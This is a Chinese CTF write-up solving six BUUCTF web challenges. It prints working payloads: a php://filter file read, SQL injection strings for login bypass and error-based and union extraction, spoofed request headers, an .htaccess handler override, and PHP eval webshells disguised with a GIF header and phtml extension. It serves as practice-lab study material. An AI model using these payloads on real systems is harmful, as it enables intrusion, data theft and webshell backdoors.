BUUCTF-WEB(9-14)

Muneyoshi發表於2024-05-19

[極客大挑戰 2019]Secret File

開啟題目檢視原始碼,找到了一個檔案

image-20240519090435723

然後就是一個按鈕,點選後,他應該是反應了,但是我們看不到

image-20240519090558776

那我們抓包看看,這裡是Burp抓包後,發到重發器傳送了一遍,看看響應包,發現了

image-20240519090720685

然後訪問這個網頁就是一個原始碼

image-20240519090803254

這裡沒有過濾php://filter

?file=php://filter/read=convert.base64-encode/resource=flag.php

base64解密後得到flag

image-20240519091200421

[極客大挑戰 2019]LoveSQL

先用萬能賬號密碼試試,成功登入

1'or true#

image-20240519091425033

登陸進去沒啥用,可能藏在資料庫了,這次我們用報錯注入,因為我試了,他會有報錯語句

爆庫名

1' and extractvalue(1,concat(0x7e,(select database()),0x7e))or '

image-20240519091951111

爆表名

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='geek'),0x7e))or '

image-20240519092125241

先爆這個love這個表裡面的列,畢竟他和題目一樣名字

1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'),0x7e))or '

image-20240519092442331

然後爆資料(我覺得我挺傻逼,我爆到第15行才有flag,純手搓)

1' and extractvalue(1,concat(0x7e,(select password from l0ve1ysq1 limit 15,1),0x7e))or '

image-20240519094449846

然後我發現死活得不到後半段,只要一看16行就報錯,我也是不懂了,所以最後我就正常得到資料的

1' union select 1,2,group_concat(password) from l0ve1ysq1#

image-20240519095116113

[極客大挑戰 2019]Http

開啟題目發現是賣鞋廠,我也是慌了,看看原始碼有沒有資訊吧

image-20240519095426160

找到了,那我們就訪問一下

image-20240519095504607

抓包開搞:

說我不是這裡來的

image-20240519095539850

Referer:https://Sycsecret.buuoj.cn

又提示不是這個瀏覽器

image-20240519095939494

User-Agent: Syclover

又提示不是本地訪問

image-20240519100038017

X-Forwarded-For:127.0.0.1

總的請求頭就是這個:

image-20240519100241156

拿下flag:

image-20240519100251884

[極客大挑戰 2019]Knife

image-20240519101402421

蟻劍直接連線

image-20240519101536198

根目錄找到flag

image-20240519101555002

[極客大挑戰 2019]Upload

這道題就是我發現可以上傳.htaccess檔案

所以這裡我就抓包上傳

<IfModule mime_module>
SetHandler application/x-httpd-php
</IfModule>

image-20240519105125439

然後開始上傳圖片馬

這道題過濾了 <? 所以常規的一句話木馬我們是不能上傳的

<script language="php">@eval($_POST['cmd'])</script>

image-20240519105510470

上傳成功後,沒有返回路徑,我們猜測在upload的資料夾下,訪問一下果然有

image-20240519105549475

那我們就找到我們上傳的一句話木馬的檔案,開始試著蟻劍連線

image-20240519105636982

發現不行,好像是.htaccess這個檔案不起作用

那我們用字尾名繞過 phtml

GIF89a
<script language="php">eval($_REQUEST['cmd'])</script>

image-20240519110546996

然後用蟻劍連線

image-20240519110634481

根目錄找到flag

image-20240519110657709

[ACTF2020 新生賽]Upload

這道題就是MIME繞過就行,還有一些字尾名被過濾了

字尾名我們就用phtml,這個是可以被解析的

image-20240519130441814

蟻劍連線,根目錄找到flag

image-20240519130549807